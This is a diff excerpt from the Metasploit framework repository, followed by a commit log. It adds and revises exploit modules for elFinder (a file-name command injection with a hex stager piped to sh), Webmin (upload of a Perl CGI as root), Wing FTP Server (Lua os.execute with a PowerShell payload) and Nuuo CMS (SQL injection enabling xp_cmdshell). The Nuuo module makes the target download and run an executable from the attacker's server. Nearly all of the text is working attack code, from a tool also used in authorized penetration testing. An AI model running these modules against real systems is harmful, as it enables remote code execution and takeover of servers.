+            i:0;r:4;
+            i:1;s:7:"resolve";
+          }
+        }
+      EOF
+    ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)
+  end
+
+  def meth
+    datastore['METHOD'] || 'POST'
+  end
+
+  def node
+    datastore['NODE'] || 1
+  end
+
+  def node_uri
+    if meth == 'GET'
+      normalize_uri(target_uri.path, '/node', node)
+    else
+      normalize_uri(target_uri.path, '/node')
+    end
+  end
+
+  def vhost_uri
+    full_uri(
+      normalize_uri(target_uri.path, '/rest/type/shortcut/default'),
+      vhost_uri: true
+    )
+  end
+
+end
@@ -0,0 +1,263 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'elFinder PHP Connector exiftran Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability in elFinder
+        versions prior to 2.1.48.
+
+        The PHP connector component allows unauthenticated users to upload
+        files and perform file modification operations, such as resizing and
+        rotation of an image. The file name of uploaded files is not validated,
+        allowing shell metacharacters.
+
+        When performing image operations on JPEG files, the filename is passed
+        to the `exiftran` utility without appropriate sanitization, causing
+        shell commands in the file name to be executed, resulting in remote
+        command injection as the web server user.
+
+        The PHP connector is not enabled by default.
+
+        The system must have `exiftran` installed and in `$PATH`.
+
+        This module has been tested successfully on elFinder versions 2.1.47,
+        2.1.20 and 2.1.16 on Ubuntu.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Thomas Chauchefoin', # Discovery
+          'q3rv0',              # Exploit
+          'bcoles'              # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-9194'],
+          ['EDB', '46481'],
+          ['URL', 'https://github.com/Studio-42/elFinder/releases/tag/2.1.48'],
+          ['URL', 'https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        => [['Auto', {}]],
+      'Privileged'     => false,
+      'DisclosureDate' => '2019-02-26',
+      'DefaultTarget'  => 0))
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to elFinder', '/elFinder/'])
+    ]
+  end
+
+  #
+  # Check if /php/connector.minimal.php exists and is executable
+  #
+  def check
+    uri = normalize_uri(target_uri.path, 'php', 'connector.minimal.php')
+    res = send_request_cgi('uri' => uri)
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.code == 200
+      vprint_status "#{uri} does not exist"
+      return CheckCode::Safe
+    end
+
+    if res.body.include? '<?php'
+      vprint_status 'PHP is not enabled'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Detected
+  end
+
+  #
+  # Upload PHP payload
+  #
+  def upload(fname)
+    # Small JPEG file from:
+    # https://github.com/mathiasbynens/small/blob/master/jpeg.jpg
+    jpeg = %w[
+      FF D8 FF DB 00 43 00 03 02 02 02 02 02 03 02 02
+      02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05
+      06 09 08 0A 0A 09 08 09 09 0A 0C 0F 0C 0A 0B 0E
+      0B 09 09 0D 11 0D 0E 0F 10 10 11 10 0A 0C 12 13
+      12 10 13 0F 10 10 10 FF C9 00 0B 08 00 01 00 01
+      01 01 11 00 FF CC 00 06 00 10 10 05 FF DA 00 08
+      01 01 00 00 3F 00 D2 CF 20 FF D9
+    ]
+    jpeg = [jpeg.join].pack('H*')
+    jpeg << rand_text_alphanumeric(50..100)
+    jpeg << "<?php #{payload.encoded} ?>"
+    jpeg << rand_text_alphanumeric(50..100)
+
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
+    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
+    data.add_part(jpeg, 'image/jpeg', nil, %(form-data; name="upload[]"; filename="#{fname}"))
+    post_data = data.to_s
+
+    print_status("Uploading payload '#{fname}' (#{post_data.length} bytes)")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => post_data
+    )
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    unless res.body.include?('"added"')
+      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
+    end
+
+    if res.body.include?('"error"') || res.body.include?('"warning"')
+      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
+    end
+
+    json_res = JSON.parse(res.body) rescue nil
+
+    if json_res.nil? || json_res['added'].empty?
+      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
+    end
+
+    json_res['added'].first['hash'] || ''
+  end
+
+  #
+  # Trigger the command injection via image rotation functionality
+  # Rotates image by 180 degrees to trigger `exiftran` code path
+  #
+  def trigger(hash)
+    print_status 'Triggering vulnerability via image rotation ...'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
+      'vars_get' => {
+        'target' => hash,
+        'degree' => '180',
+        'mode'   => 'rotate',
+        'cmd'    => 'resize'
+      }
+    }, 5)
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    if res.body.include?('"error"') || res.body.include?('"warning"')
+      fail_with Failure::UnexpectedReply, "Image rotate failed: #{res.body}"
+    end
+  end
+
+  #
+  # Delete uploaded file
+  #
+  def delete_file(hash)
+    print_status 'Removing uploaded file ...'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
+      'vars_get' => {
+        'cmd' => 'rm',
+        'targets[]' => hash
+      }
+    }, 15)
+
+    unless res
+      print_status 'Connection failed'
+      return
+    end
+
+    if res.body.include?('errFileNotFound')
+      print_error "Could not delete uploaded file. Unexpected reply: #{res.body}"
+      return
+    end
+
+    print_good 'Deleted uploaded file'
+  end
+
+  #
+  # Execute payload
+  #
+  def execute_payload(php_fname)
+    path = normalize_uri(target_uri.path, 'php', php_fname)
+
+    print_status "Executing payload (#{path}) ..."
+
+    res = send_request_cgi({
+      'uri' => path
+    }, 15)
+
+    unless res
+      print_status 'No reply'
+      return
+    end
+
+    unless res.code == 200
+      fail_with Failure::UnexpectedReply, "Executing payload failed (HTTP #{res.code})"
+    end
+  end
+
+  #
+  # Remove uploaded file
+  #
+  def cleanup
+    delete_file @hash unless @hash.nil?
+  ensure
+    super
+  end
+
+  #
+  # upload && execute
+  #
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    fname = rand_text_alphanumeric(6..10)
+    php_fname = ".#{rand_text_alphanumeric(6..10)}.php"
+
+    # Max file name length is ~250 characters
+    # and characters such as `/` are forbidden.
+    # Hex encoded stager copies the uploaded file from the `files` directory
+    # to the working directory (`php`) and changes the extension to `.php`
+    # The stager is decoded with xxd when the vuln is triggered.
+    stager = "cp ../files/#{fname}.jpg*echo* #{php_fname}"
+
+    # Upload our payload jpg file with encoded stager in the filename
+    jpg_fname = "#{fname}.jpg;echo #{stager.unpack('H*').flatten.first} |xxd -r -p |sh& #.jpg"
+    @hash = upload jpg_fname
+
+    if @hash.to_s == ''
+      fail_with Failure::Unknown, 'Upload failed: Failed to retrieve file hash ID'
+    end
+
+    trigger @hash
+
+    register_file_for_cleanup php_fname
+
+    execute_payload php_fname
+  end
+end
@@ -0,0 +1,212 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Webmin Upload Authenticated RCE',
+      'Description'    => %q(
+        This module exploits an arbitrary command execution vulnerability in Webmin
+        1.900 and lower versions. Any user authorized to the "Upload and Download"
+        module can execute arbitrary commands with root privileges.
+
+        In addition, if the 'Running Processes' (proc) privilege is set the user can
+        accurately determine which directory to upload to. Webmin application files
+        can be written/overwritten, which allows remote code execution. The module
+        has been tested successfully with Webmin 1.900 on Ubuntu v18.04.
+
+        Using GUESSUPLOAD attempts to use a default installation path in order to
+        trigger the exploit.
+      ),
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>',                  # Vulnerability Discovery, Initial PoC module
+        'Ziconius <Kris.Anderson[at]immersivelabs.com>' # Updated MSF module; removing 'proc' requirement.
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '46201'],
+          ['URL', 'https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'perl'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'RPORT' => 10000,
+          'SSL'   => true
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.900', {}]],
+      'DisclosureDate' => 'Jan 17 2019',
+      'DefaultTarget'  => 0)
+    )
+    register_options [
+        OptBool.new('GUESSUPLOAD', [true, 'If no "proc" permissions exists use default path.', false]),
+        OptString.new('USERNAME',  [true, 'Webmin Username']),
+        OptString.new('PASSWORD',  [true, 'Webmin Password']),
+        OptString.new('FILENAME',  [false, 'Filename used for the uploaded data']),
+        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
+    ]
+  end
+
+  def login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+      'cookie' => 'testing=1',
+      'vars_post' => {
+        'page' => '',
+        'user' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD']
+      }
+    })
+
+    if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
+      return $1
+    end
+
+    return nil unless res
+    ''
+  end
+
+  ##
+  # Target and input verification
+  ##
+  def check
+    cookie = login
+    return CheckCode::Detected if cookie == ''
+    return CheckCode::Unknown if cookie.nil?
+
+    vprint_status('Attempting to execute...')
+    command = "echo #{rand_text_alphanumeric(0..9)}"
+
+    res = send_request_cgi({
+      'uri'     => "#{target_uri}/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
+      'cookie'  => "sid=#{cookie}"
+    })
+
+    if res && res.code == 200 && res.message =~ /Document follows/
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  ##
+  # Exploiting phase
+  ##
+  def exploit
+    cookie = login
+    if cookie == '' || cookie.nil?
+      fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
+    end
+    print_good("Session cookie: #{cookie}")
+
+    ##
+    # Directory and SSL verification for referer
+    ##
+    phost = ssl ? 'https://' : 'http://'
+    phost << peer
+    print_status("Target URL => #{phost}")
+
+    res = send_request_raw(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
+      'headers' =>
+        {
+          'Referer' => "#{phost}/sysinfo.cgi?xnavigation=1"
+        },
+      'cookie' => "redirect=1; testing=1; sid=#{cookie}"
+    )
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Request failed')
+    end
+
+    print_status 'Searching for directory to upload...'
+    if res.body =~ /Running Processes/ && res.body =~ /[^ ] ([\/\w]+)miniserv\.pl/
+      directory = $1
+    elsif datastore['GUESSUPLOAD']
+      print_warning('Could not determine upload directory. Using /usr/share/webmin/')
+      directory = '/usr/share/webmin/'
+    else
+      print_error('Failed to determine webmin share directory')
+      print_error('Set GUESSUPLOAD to attempt upload to a default location')
+      return
+    end
+    directory << 'file'
+    filename = datastore['FILENAME'].present? ? datastore['FILENAME'] : "#{rand_text_alpha_lower(5..8)}.cgi"
+    filename << '.cgi' unless filename.end_with?('.cgi')
+    upload_attempt(phost, cookie, directory, filename)
+
+    ##
+    # Loading phase of the vulnerable file
+    # Command execution and shell retrieval
+    ##
+    print_status("Attempting to execute the payload...")
+    command = payload.encoded
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri, 'file', filename),
+      'cookie'  => "sid=#{cookie}"
+    })
+  end
+
+  def upload_attempt(phost, cookie, dir, filename)
+    limit = rand_text_alpha_upper(5..10)
+    tmpvar = rand_text_alpha_upper(3..8)
+    code = <<~HERE
+    #!/usr/bin/perl
+    $#{tmpvar} = <<'#{limit}';
+    #{payload.encoded}
+    #{limit}
+    `$#{tmpvar}`;
+    HERE
+
+    message = Rex::MIME::Message.new
+    message.add_part(code, nil, nil, "form-data; name=\"upload0\"; filename=\"#{filename}\"")
+    message.add_part(dir, nil, nil, 'form-data; name="dir"')
+    message.add_part('root', nil, nil, 'form-data; name="user"')
+    message.add_part('1', nil, nil, 'form-data;  name="group_def"')
+    message.add_part('', nil, nil, 'form-data;  name="group"')
+    message.add_part('0', nil, nil, 'form-data;  name="zip"')
+    message.add_part('1', nil, nil, 'form-data;  name="email_def"')
+    message.add_part('Upload', nil, nil, 'form-data;  name="ok"')
+
+    res2 = send_request_raw(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'updown', 'upload.cgi'),
+      'vars_get' => {'id' => "#{rand_text_numeric(8..12)}"},
+      'data' => message.to_s,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'headers' =>
+        {
+          'Referer' => "#{phost}/updown/?xnavigation=1"
+        },
+      'cookie' => "redirect=1; testing=1; sid=#{cookie}"
+    )
+
+    if res2 && res2.code == 200 && res2.body =~ /Saving file/
+      print_good "File #{filename} was successfully uploaded."
+      register_file_for_cleanup(filename)
+    else
+      print_error 'Upload failed.'
+      fail_with(Failure::UnexpectedReply, 'Failed to upload file')
+    end
+  end
+end
@@ -3,39 +3,44 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

+require 'msf/core/exploit/powershell'
+
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
+
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wing FTP Server Authenticated Command Execution',
      'Description'    => %q{
        This module exploits the embedded Lua interpreter in the admin web interface for
-        versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
+        versions 3.0.0 and above. When supplying a specially crafted HTTP POST request
        an attacker can use os.execute() to execute arbitrary system commands on
        the target with SYSTEM privileges.
      },
      'Author'         =>
        [
-          'Nicholas Nam <nick[at]executionflow.org>'
+          'Nicholas Nam <nick[at]executionflow.org>',
+          'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # minor improvements
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
-          [ 'URL', 'http://www.wftpserver.com' ]
+          ['URL', 'http://www.wftpserver.com'],
+          ['URL', 'https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm']
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
-          [ 'Windows VBS Stager', {} ]
+          ['Wing FTP Server >= 3.0.0', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jun 19 2014',
-      'DefaultTarget'  => 0
-    ))
+      'DefaultTarget'  => 0))

    register_options(
      [
@@ -45,53 +50,119 @@ class MetasploitModule < Msf::Exploit::Remote
      ], self.class
    )
    deregister_options('CMDSTAGER::FLAVOR')
+    deregister_options('CMDSTAGER::DECODER')
+    deregister_options('URIPATH')
+    deregister_options('SRVHOST')
+    deregister_options('SRVPORT')
  end

-  def check
-    res = send_request_cgi(
-      {
-        'uri'     =>  '/admin_login.html',
-        'method'  => 'GET'
-      })
+  @session_cookie = ''
+  @version = ''
+  @psh = false
+  @vuln_check = false

-    if !res
-      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
-    elsif res.code != 200
-      fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
-    elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
-      return Exploit::CheckCode::Appears
+  def check
+    @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+    if @session_cookie.nil?
+      return CheckCode::Unknown
    end

-    Exploit::CheckCode::Safe
+    ver = send_request_cgi(
+      'uri'       => '/admin_license.html',
+      'method'    => 'POST',
+      'cookie'    => @session_cookie,
+      'ctype'     => 'text/plain;charset=UTF-8'
+    )
+
+    unless ver
+      vprint_error("Connection failed!")
+      return CheckCode::Unknown
+    end
+
+    unless ver.code == 200 && ver.body.include?('Wing FTP Server')
+      return CheckCode::Safe
+    end
+
+    @version = Gem::Version.new(ver.body.scan(/Wing FTP Server ([\d\.]+)/).flatten.first)
+    print_status("Found Wing FTP Server #{@version}")
+
+    # Lua capabilities and administrator console were added in version 3.0.0, so everything above that is (probably) vulnerable
+    unless @version >= Gem::Version.new('3.0.0')
+      @vuln_check = false
+      return CheckCode::Safe
+    end
+
+    @vuln_check = true
+    winenv_path = execute_command("PATH")
+
+    unless winenv_path
+      vprint_error("Connection failed!")
+      return CheckCode::Unknown
+    end
+
+    if winenv_path.code == 200
+      winenv_path.body.split(';').each do |path_val|
+        if (/powershell/i) =~ path_val
+          print_good("Found Powershell at #{path_val}")
+          @psh = true
+        end
+      end
+    else
+      @psh = false
+    end
+
+    @vuln_check = false
+    return CheckCode::Vulnerable
  end

  def exploit
-    username = datastore['USERNAME']
-    password = datastore['PASSWORD']
-    @session_cookie = authenticate(username, password)
+    vprint_status("Authenticating...")
+    unless [CheckCode::Vulnerable].include? check
+      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
+    end

-    print_status("Sending payload")
-    # Execute the cmdstager, max length of the commands is ~1500
-    execute_cmdstager(flavor: :vbs, linemax: 1500)
+    if @psh == true
+      print_status('Executing payload via PowerShell...')
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true)
+      execute_command(psh_command)
+    else
+      if @version > Gem::Version.new('4.3.8')
+        fail_with(Failure::NoTarget, "Version #{@version} detected and PowerShell not found, aborting exploit attempt!")
+      end
+      print_warning("PowerShell not found, will revert to CmdStager for payload delivery!")
+      print_status("Sending payload...")
+      # Execute the CmdStager, max length of the commands is ~1500
+      execute_cmdstager(flavor: :vbs, linemax: 1500)
+    end
  end

-  def execute_command(cmd, _opts = {})
-    command = "os.execute('cmd /c #{cmd}')"
+  def execute_command(cmd,_opts = {})
+    # Wrap cmd with [[ ]] to prevent potential problems.
+    if @vuln_check == true
+      command = "print(os.getenv([[#{cmd}]]))"
+    else
+      command = "os.execute([[#{cmd}]])"
+    end

    res = send_request_cgi(
-      'uri'       => '/admin_lua_script.html',
-      'method'    => 'POST',
-      'cookie'    => @session_cookie,
-      'vars_post' => { 'command' => command }
+      'uri'       		=> '/admin_lua_script.html',
+      'method'    		=> 'POST',
+      'encode_params' => true,
+      'cookie'    		=> @session_cookie,
+      'ctype'     		=> 'text/plain;charset=UTF-8',
+      'vars_post' 		=> { 'command' => command }
    )

-    if res && res.code != 200
+    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
    end
+
+    if @vuln_check
+      return res
+    end
  end

  def authenticate(username, password)
-    print_status("Authenticating")
    res = send_request_cgi(
      'uri'       => '/admin_loginok.html',
      'method'    => 'POST',
@@ -104,19 +175,23 @@ class MetasploitModule < Msf::Exploit::Remote
      }
    )

-    uidadmin = ''
-    if !res
-      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
-    elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
-      res.get_cookies.split(';').each do |cookie|
-        cookie.split(',').each do |value|
-          uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
-        end
-      end
-    else
-      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    unless res
+      print_error("#{peer} - Admin login page was unreachable.")
+      return nil
    end

-    "UIDADMIN=#{uidadmin}"
+    if res.code == 200 && res.body =~ /location='main.html\?lang=english';/
+      res.get_cookies.split(';').each do |cookie|
+        cookie.split(',').each do |value|
+          if value.split('=')[0] =~ /UIDADMIN/
+            vprint_good("Authentication successful, got session cookie #{value.split('=')[1]}")
+            return res.get_cookies.split(';')[0]
+          end
+        end
+      end
+    end
+
+    print_error("#{peer} - Authentication failed!")
+    return nil
  end
 end
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::Nuuo
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => 'Nuuo Central Management Authenticated SQL Server SQLi',
+      'Description'     => %q{
+      The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
+      This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
+      installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
+      This module will either use a provided session number (which can be guessed with an auxiliary
+      module) or attempt to login using a provided username and password - it will also try the
+      default credentials if nothing is provided.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'  # Vulnerability discovery and Metasploit module
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2018-18982' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
+
+        ],
+      'Platform'        => 'win',
+      'Arch'            => ARCH_X86,
+      'Stance'          => Msf::Exploit::Stance::Aggressive,  # we need this to run in the foreground
+      'Targets'         =>
+        [
+          [ 'Nuuo Central Management Server <= v2.10.0', {} ],
+        ],
+      'Notes'           =>
+        {
+          'SideEffects'   => [ ARTIFACTS_ON_DISK ]
+        },
+      'Privileged'      => false,  # we run as NETWORK_SERVICE
+      'DisclosureDate'  => 'Oct 11 2018',
+      'DefaultTarget'   => 0))
+    register_options [
+      Opt::RPORT(5180),
+      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
+      OptString.new('URIPATH', [true,  'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
+    ]
+  end
+
+
+  def inject_sql(sql, final = false)
+    sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
+    if final
+      nucs_send_msg_async(sql)
+    else
+      nucs_send_msg(sql)
+    end
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    unless @pl
+      print_error("A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_good('Sending the payload to CMS...')
+    send_response(cli, @pl)
+
+    Rex.sleep(3)
+
+    print_status('Executing shell...')
+    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
+    register_file_for_cleanup("c:/windows/temp/#{@filename}")
+  end
+
+  def create_hex_cmd(cmd)
+    var = rand_text_alpha(2)
+    hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
+    cmd.each_byte { |b|
+      hex_cmd << b.to_i.to_s(16)
+    }
+    hex_cmd << "; exec (@#{var})"
+  end
+
+  def primer
+    # we need to roll our own here instead of using the MSSQL mixins
+    # (tried that and it doesn't work)
+    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
+    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
+    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
+    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
+    download_pl = %{xp_cmdshell }
+    download_pl << %{'cd C:\\windows\\temp\\ && }
+    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
+    download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
+    download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
+    download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
+    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}
+
+    print_status('Injecting PowerShell payload')
+    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
+    register_file_for_cleanup("c:/windows/temp/#{ps1}")
+  end
+
+  def exploit
+    nucs_login
+
+    unless @nucs_session
+      fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
+    end
+
+    @pl = generate_payload_exe
+
+    #do not use SSL
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) {super}
+    rescue Timeout::Error
+      datastore['SSL'] = true if ssl_restore
+    end
+  end
+end
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Metasploit	69f3c56611	automatic module_metadata_base.json update	2019-03-18 05:39:14 -07:00
Jacob Robles	c4ac4eb5a7	Land #11466 , Add Jenkins ACL bypass and metaprogramming RCE	2019-03-18 05:24:33 -07:00
William Vu	47dfac8620	Land #11573 , Windows 2019 support in Windows::Priv	2019-03-17 10:16:45 -07:00
William Vu	1acff72f22	Land #11568 , Ubiquiti USG SSH LoginScanner support	2019-03-17 10:16:45 -07:00
Brendan Coles	9abcfde2ad	Land #11571 , Change `cable-d` to `cable-docsis` in snmp_default_pass.txt	2019-03-16 16:52:33 -07:00
Metasploit	c68b397304	automatic module_metadata_base.json update	2019-03-15 11:32:53 -07:00
Brent Cook	8d01b4de83	Land #11382 , Added BMC Patrol Agent Command Exec Module	2019-03-15 11:24:56 -07:00
Metasploit	d79f9bf09f	automatic module_metadata_base.json update	2019-03-15 06:43:40 -07:00
Brent Cook	5d8a2bb0e9	Land #11564 , add a JavaMeterpreterDebug option to the java payloads	2019-03-15 06:22:57 -07:00
Jacob Robles	058cfc1ce9	Land #11385 , Add Webmin Upload Exec	2019-03-15 06:20:41 -07:00
Brent Cook	f5024ce76f	Land #11561 , Add OpenSUSE detection to Linux system lib	2019-03-15 05:59:43 -07:00
Brent Cook	162e6a130f	Land #11567 , Bump ActiveRecord version in PG deprecated warning suppression	2019-03-15 05:58:11 -07:00
Brent Cook	16d88fd2db	Land #11553 , show user bundler exception, remove outdated advice	2019-03-15 05:58:11 -07:00
William Vu	f5604283b2	Land #11554 , irb and pry for command shells	2019-03-14 12:01:22 -07:00
Metasploit	aa4896e3b7	Bump version of framework to 4.17.47	2019-03-14 10:03:09 -07:00
William Vu	022fa4da57	Land #11558 , Ubiquiti UniFi for SSH LoginScanner	2019-03-14 07:56:31 -07:00
Metasploit	19f8187840	automatic module_metadata_base.json update	2019-03-12 22:11:00 -07:00
Brendan Coles	badcdda809	Land #11557 , Add root/ubnt default creds to wordlists/routers_userpass.txt	2019-03-12 22:11:00 -07:00
Wei Chen	038ed01e9d	Land #11547 , Add Total.js Directory Traversal module	2019-03-12 22:11:00 -07:00
Metasploit	e38891bc05	automatic module_metadata_base.json update	2019-03-11 14:02:39 -07:00
Brent Cook	d9ccaea344	Land #11543 , tweak rubocop settings	2019-03-11 13:54:25 -07:00
Brent Cook	0860c07e89	Land #11544 , add reregister_tcp/udp_options	2019-03-11 13:54:25 -07:00
Metasploit	ceaf921a9c	automatic module_metadata_base.json update	2019-03-11 13:20:39 -07:00
Metasploit	d163ebdfef	automatic module_metadata_base.json update	2019-03-11 13:04:59 -07:00
Shelby Pace	3d9f1eef17	Land #11545 , Add elFinder Command Injection	2019-03-11 13:04:59 -07:00
Brent Cook	2c928207d4	Land #11535 , add deregister_http_client_options	2019-03-10 15:08:16 -05:00
Metasploit	1223b1d672	automatic module_metadata_base.json update	2019-03-07 10:35:47 -08:00
Wei Chen	2f5909b9fc	Land #11427 , Add Fortinet SSL VPN Bruteforce Login Utility	2019-03-07 10:27:41 -08:00
Metasploit	4fcc04532f	Bump version of framework to 4.17.46	2019-03-07 10:03:08 -08:00
Brent Cook	a5bcabc9c0	Land #11521 , add RMI support for UnicastRef2 responses	2019-03-06 18:07:45 -08:00
Metasploit	55df841a18	automatic module_metadata_base.json update	2019-03-06 18:03:42 -08:00
Brent Cook	e669dc6430	Land #11092 , Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module	2019-03-06 17:52:15 -08:00
Brent Cook	2541cf09ca	Land #10012 , Add an Android module to run payloads with su on a rooted device	2019-03-06 17:48:33 -08:00
Metasploit	4a0b23a2de	automatic module_metadata_base.json update	2019-03-06 16:02:23 -08:00
Brent Cook	a03a4d957a	Land #11534 , fix module title for sonicwall_xmlrpc_rce	2019-03-06 15:48:49 -08:00
Brent Cook	4faed16e18	Land #11524 , remove some unused bits from modules	2019-03-06 15:45:19 -08:00
Metasploit	950037503c	automatic module_metadata_base.json update	2019-03-05 23:50:57 -08:00
William Vu	500e1617f6	Land #11419 , systemd user service persistence	2019-03-05 23:41:28 -08:00
Metasploit	8169f8d139	automatic module_metadata_base.json update	2019-03-05 20:11:12 -08:00
